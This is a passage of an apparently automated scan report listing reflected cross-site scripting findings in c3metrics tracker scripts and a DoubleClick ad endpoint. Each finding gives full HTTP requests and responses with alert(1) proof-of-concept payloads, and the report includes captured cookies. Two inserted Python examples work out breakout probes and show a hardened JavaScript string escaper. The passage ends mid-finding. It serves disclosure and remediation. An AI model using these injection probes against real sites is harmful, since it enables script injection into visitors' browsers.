Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadver_05-11-2011-14-59-16_8816927001305125956ZZZZadcon_05-11-2011-14-59-56_9087559411305125996; SERVERID=s15

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:34:58 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sun, 15-May-2011 13:34:58 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-11-2011-14-59-56_9087559411305125996ZZZZadver_05-12-2011-13-34-58_711316571305207298; expires=Tue, 10-May-2016 13:34:58 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_711316571305207298; expires=Thu, 12-May-2011 13:49:58 GMT; path=/; domain=c3metrics.com
Content-Length: 6698
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
;this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='711316571305207298';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72f8e87<script>alert(1)</script>c1ec23e9e95';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3V
...[SNIP]...

2.6. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the uid request parameter is copied unmodified into the response body, inside the single-quoted JavaScript string assigned to c3VJSrvSet (the server populates rvSet from uid and uidSet from rv; compare 2.4). The payload baa91<script>alert(1)</script>c29c50d111f was submitted in the uid parameter and echoed without encoding. The execution contexts are those described in 2.2: the injected <script> element runs when the text/html response is opened directly, while in the script-src context a single quote is needed to leave the literal.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=baa91<script>alert(1)</script>c29c50d111f&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?uilKAFF8CQD5Q0gAAAAAAFufCgAAAAAAAgAAAAYAAAAAAP8AAAAFCW8VDwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgyQQAAAAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABa8F1Eo8UUCvN5p9OBJ4HIO6F18GIqSmJVEsk5AAAAAA==,,http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2Fto-do-tonight-watch-american-idol-priest-opens-friday-the-13th,Z%3D728x90%26s%3D621649%26_salt%3D1477449765%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Flyons%252Flifestyle%252Fentertainment%252Fx1539859994%252FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th%26r%3D0,1c5cab68-7c9c-11e0-acd7-cb9ffa1aa3ae
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadver_05-11-2011-14-59-16_8816927001305125956ZZZZadcon_05-11-2011-14-59-56_9087559411305125996; SERVERID=s15

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:35:03 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sun, 15-May-2011 13:35:03 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-11-2011-14-59-56_9087559411305125996ZZZZadver_05-12-2011-13-35-03_11345519711305207303; expires=Tue, 10-May-2016 13:35:03 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_11345519711305207303; expires=Thu, 12-May-2011 13:50:03 GMT; path=/; domain=c3metrics.com
Content-Length: 6679
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
.c3VJSnuid='11345519711305207303';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='baa91<script>alert(1)</script>c29c50d111f';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJScollection[a].C3VJSFindBaseurl(c3VTconsts.c3VJSconst.c3VJS
...[SNIP]...

2.7. http://480-adver-view.c3metrics.com/v.js [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /v.js

Issue detail

The value of the cid request parameter is copied unmodified into the body of v.js, inside the double-quoted JavaScript string b that holds the query string for c3VTabstrct-6-2.php. The script then appends b to http://480-adver-view.c3metrics.com/ and uses the result as the src of a dynamically created script element, so the reflected value is also forwarded, still unencoded, to the endpoint of findings 2.1 to 2.6. The payload a06dd<script>alert(1)</script>49f90eb1dd2 was submitted in the cid parameter and echoed without encoding. v.js is served as text/html, so the injected <script> element executes if the URL is opened directly; when v.js is loaded as a script, as intended, a double quote is needed to terminate the literal.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=adver&cid=480a06dd<script>alert(1)</script>49f90eb1dd2&t=72 HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?uilKAFF8CQD5Q0gAAAAAAFufCgAAAAAAAgAAAAYAAAAAAP8AAAAFCW8VDwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgyQQAAAAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABa8F1Eo8UUCvN5p9OBJ4HIO6F18GIqSmJVEsk5AAAAAA==,,http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2Fto-do-tonight-watch-american-idol-priest-opens-friday-the-13th,Z%3D728x90%26s%3D621649%26_salt%3D1477449765%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Flyons%252Flifestyle%252Fentertainment%252Fx1539859994%252FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th%26r%3D0,1c5cab68-7c9c-11e0-acd7-cb9ffa1aa3ae
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadver_05-11-2011-14-59-16_8816927001305125956ZZZZadcon_05-11-2011-14-59-56_9087559411305125996

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:43 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1049
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=s14; path=/
Cache-control: private

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adver&cid=480a06dd<script>alert(1)</script>49f90eb1dd2&t=72&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://480-adver-view.c3metrics.com/'+b;var r=ne
...[SNIP]...

2.8. http://480-adver-view.c3metrics.com/v.js [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /v.js

Issue detail

The value of the id request parameter is copied unmodified into the body of v.js, inside the same double-quoted JavaScript string b described in 2.7, and from there into the src of the script element that loads c3VTabstrct-6-2.php. The payload e1bdb<script>alert(1)</script>2e525f817b was submitted in the id parameter and echoed without encoding. As in 2.7, the injected <script> element executes if the text/html response is opened directly, while a double quote is needed to terminate the literal in the script-src context.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=advere1bdb<script>alert(1)</script>2e525f817b&cid=480&t=72 HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?uilKAFF8CQD5Q0gAAAAAAFufCgAAAAAAAgAAAAYAAAAAAP8AAAAFCW8VDwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgyQQAAAAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABa8F1Eo8UUCvN5p9OBJ4HIO6F18GIqSmJVEsk5AAAAAA==,,http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2Fto-do-tonight-watch-american-idol-priest-opens-friday-the-13th,Z%3D728x90%26s%3D621649%26_salt%3D1477449765%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Flyons%252Flifestyle%252Fentertainment%252Fx1539859994%252FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th%26r%3D0,1c5cab68-7c9c-11e0-acd7-cb9ffa1aa3ae
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadver_05-11-2011-14-59-16_8816927001305125956ZZZZadcon_05-11-2011-14-59-56_9087559411305125996

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:42 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1048
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=s8; path=/
Cache-control: private

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=advere1bdb<script>alert(1)</script>2e525f817b&cid=480&t=72&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://480-adver-view.c3metrics.com/'+b;
...[SNIP]...

2.9. http://480-adver-view.c3metrics.com/v.js [t parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /v.js

Issue detail

The value of the t request parameter is copied unmodified into the body of v.js, inside the same double-quoted JavaScript string b described in 2.7, and from there into the src of the script element that loads c3VTabstrct-6-2.php. The payload d16cc<script>alert(1)</script>85e60d966a9 was submitted in the t parameter and echoed without encoding. As in 2.7, the injected <script> element executes if the text/html response is opened directly, while a double quote is needed to terminate the literal in the script-src context.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=adver&cid=480&t=72d16cc<script>alert(1)</script>85e60d966a9 HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?uilKAFF8CQD5Q0gAAAAAAFufCgAAAAAAAgAAAAYAAAAAAP8AAAAFCW8VDwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgyQQAAAAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABa8F1Eo8UUCvN5p9OBJ4HIO6F18GIqSmJVEsk5AAAAAA==,,http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2Fto-do-tonight-watch-american-idol-priest-opens-friday-the-13th,Z%3D728x90%26s%3D621649%26_salt%3D1477449765%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Flyons%252Flifestyle%252Fentertainment%252Fx1539859994%252FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th%26r%3D0,1c5cab68-7c9c-11e0-acd7-cb9ffa1aa3ae
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadver_05-11-2011-14-59-16_8816927001305125956ZZZZadcon_05-11-2011-14-59-56_9087559411305125996

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:43 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1049
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=s11; path=/
Cache-control: private

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adver&cid=480&t=72d16cc<script>alert(1)</script>85e60d966a9&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://480-adver-view.c3metrics.com/'+b;var r=new Reg
...[SNIP]...
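Findings 2.2 to 2.9 all reflect the probe into a JavaScript string literal in a body that is served as text/html, so whether a given probe actually runs depends on how the response is parsed. The checker below is added here as an illustration; it is not part of the XSS.CX report or of the c3metrics code. It locates a probe in a captured body, works out the string-literal state at that point, and reports whether the probe runs under HTML parsing (direct navigation) and under JavaScript parsing (loaded through a script element, as v.js does). The first two sample fragments are copied from the responses in 2.2 and 2.7; the third is a constructed stand-in for the truncated 2.10 response, since the statement enclosing that probe is not visible in the report.

```python
# Added example (not from the report or from c3metrics): classify a reflected
# probe by the JavaScript string-literal state at its position and by the
# response's Content-Type, and derive the probe that fits the script-src path.
import re

# Fragments copied from the captured responses in findings 2.2 and 2.7 above.
SAMPLE_2_2 = ("this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid="
              "'adver4c8e5<script>alert(1)</script>3b4a9a22f22';"
              "this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480';")
SAMPLE_2_7 = ('var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adver&cid=480'
              'a06dd<script>alert(1)</script>49f90eb1dd2&t=72&rv=&uid=&td=";'
              "var c=document.getElementsByTagName('script')[0];")
# Constructed stand-in for the 2.10 response, whose enclosing statement is
# cut off in the report; only the probe itself is taken from the finding.
SAMPLE_2_10 = ('var u="http://adlog.com.com/adlog/e/r=8041&b=2'
               'ce280"-alert(1)-"57eeb56e770&l=";')


def js_string_state(text):
    """State of a JavaScript lexer at the end of `text`, as far as string
    literals go: None (code), "'" or '"' (inside that kind of literal).
    Backslash escapes are honoured; comments, regex and template literals
    are not modelled, which is sufficient for minified tracker output."""
    state = None
    i = 0
    while i < len(text):
        ch = text[i]
        if state is None:
            if ch in "'\"":
                state = ch
        elif ch == "\\":
            i += 1                      # skip the escaped character
        elif ch == state:
            state = None
        i += 1
    return state


def classify_reflection(body, payload, content_type):
    """Locate `payload` in `body` and report the contexts in which it runs."""
    off = body.find(payload)
    if off == -1:
        return {"reflected": False}
    quote = js_string_state(body[:off])
    html_type = content_type.split(";")[0].strip().lower() == "text/html"
    # an unescaped quote of the enclosing kind inside the payload ends the literal
    closes_literal = quote is not None and re.search(r"(?<!\\)" + quote, payload) is not None
    return {
        "reflected": True,
        "offset": off,
        "js_string_quote": quote,
        # opened directly, a text/html body is parsed as HTML: a literal
        # <script> element runs regardless of the JS string it sits in
        "runs_if_parsed_as_html": html_type and "<script" in payload.lower(),
        # loaded via <script src=...>, the body is parsed as JavaScript: the
        # payload runs only in code context or if it terminates the literal
        "runs_if_parsed_as_js": quote is None or closes_literal,
    }


def breakout_probe(quote):
    """Probe that executes in the script-src context for a given string state."""
    if quote is None:
        return "alert(1)"
    return quote + "-alert(1)-" + quote


if __name__ == "__main__":
    cases = (("2.2", SAMPLE_2_2, "4c8e5<script>alert(1)</script>3b4a9a22f22"),
             ("2.7", SAMPLE_2_7, "a06dd<script>alert(1)</script>49f90eb1dd2"),
             ("2.10", SAMPLE_2_10, 'ce280"-alert(1)-"57eeb56e770'))
    for label, body, probe in cases:
        result = classify_reflection(body, probe, "text/html")
        print(label, result, "re-test with:", breakout_probe(result["js_string_quote"]))
```

Run against the report's own tag-style probes the checker reports runs_if_parsed_as_html true and runs_if_parsed_as_js false, which is why a quote-break probe of the kind used against ad.doubleclick.net in 2.10 is the better re-test for the script-src path that the tracker actually uses.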

2.10. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [b parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the b request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce280"-alert(1)-"57eeb56e770 was submitted in the b parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
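The pattern behind 2.10 and 2.11 is a request value concatenated into a double-quoted JavaScript literal. Where the value cannot be kept out of script context, the remaining option is to encode it so that it can neither end the literal nor the enclosing script block. The code below is an added example, not code from the report or from DoubleClick: unsafe_js_string is a constructed stand-in for the ad server's template, js_string_escape encodes every character outside a small safe set as a \uXXXX escape, and the two check helpers show that the probe from 2.10 terminates the literal in the unsafe form and survives only as data in the hardened one.

```python
# Added example (not from the report or from DoubleClick): the vulnerable
# interpolation beside a hardened form for values that must live inside a
# JavaScript string literal.
import json
import re

PAYLOAD = 'ce280"-alert(1)-"57eeb56e770'     # probe from finding 2.10 above

# Characters emitted as-is; everything else becomes a \uXXXX escape, so quotes,
# backslashes, angle brackets, ampersands, slashes, newlines and U+2028/U+2029
# can neither terminate the literal nor the surrounding <script> element.
_SAFE = set("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 ,.-_:=?")


def unsafe_js_string(name, value):
    """Vulnerable pattern: the raw value is concatenated into a "..." literal."""
    return 'var ' + name + '="' + value + '";'


def js_string_escape(value):
    """Escape `value` for use inside a JavaScript string literal of either kind."""
    out = []
    for ch in value:
        cp = ord(ch)
        if ch in _SAFE:
            out.append(ch)
        elif cp < 0x10000:
            out.append("\\u%04x" % cp)
        else:                                   # astral code point: surrogate pair
            cp -= 0x10000
            out.append("\\u%04x\\u%04x" % (0xD800 + (cp >> 10), 0xDC00 + (cp & 0x3FF)))
    return "".join(out)


def safe_js_string(name, value):
    """Hardened form of unsafe_js_string(): same statement, encoded value."""
    return 'var ' + name + '="' + js_string_escape(value) + '";'


def unescaped_dquotes(statement):
    """Number of double quotes not preceded by a backslash; one intact
    literal contributes exactly two."""
    return len(re.findall(r'(?<!\\)"', statement))


def js_value(statement):
    """Value a JavaScript engine would assign if the literal stayed intact.
    JSON's \\uXXXX and surrogate-pair rules match JavaScript's for the escapes
    js_string_escape emits, so json.loads is a faithful decoder here. Returns
    None when the quoted text is not a single string, i.e. the literal was
    terminated early by the value."""
    try:
        return json.loads(statement[statement.index('"'):-1])
    except ValueError:
        return None


if __name__ == "__main__":
    for build in (unsafe_js_string, safe_js_string):
        stmt = build("b", PAYLOAD)
        print(stmt)
        print("  quotes:", unescaped_dquotes(stmt), " decoded:", js_value(stmt))
```

The decode check matters as much as the quote count: an encoder that merely strips dangerous characters would also pass the quote count, but it would silently change the tracking value, whereas the \uXXXX form round-trips every character, including the probe's own quotes, back to the original string.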

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2ce280"-alert(1)-"57eeb56e770&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:30:24 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
q%3B240571327%3B0-0%3B0%3B62874418%3B4307-300/250%3B40422013/40439800/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs513717%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2ce280"-alert(1)-"57eeb56e770&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.0
...[SNIP]...

2.11. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a895"-alert(1)-"c9be2eb186c was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

